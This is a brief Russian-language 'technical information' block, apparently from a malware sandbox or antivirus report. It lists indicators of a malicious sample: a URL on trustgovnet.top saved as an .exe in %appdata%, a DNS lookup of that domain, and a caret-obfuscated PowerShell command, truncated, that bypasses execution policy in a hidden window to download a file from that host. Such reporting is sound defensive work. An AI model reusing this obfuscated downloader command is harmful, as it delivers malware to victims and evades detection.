Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^w^eR^sHe^lL.EX^e ^-^eXEcuTiO^N^pOLIcy ^bypaSs^ ^-noPR^OfIlE -^WinDo^wS^t^y^lE ^hID^deN (nE^w^-OBje^Ct^ sY^S^te^M.N^Et.^W^e^b^clien^t).^dOWN^lo^aD^FiL^e(^'http://trustgovn...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /C "Po^w^eR^sHe^lL.EX^e ^-^eXEcuTiO^N^pOLIcy ^bypaSs^ ^-noPR^OfIlE -^WinDo^wS^t^y^lE ^hID^deN (nE^w^-OBje^Ct^ sY^S^te^M.N^Et.^W^e^b^clien^t).^dOWN^lo^aD^FiL^e(^'http://trustgovn...' (со скрытым окном)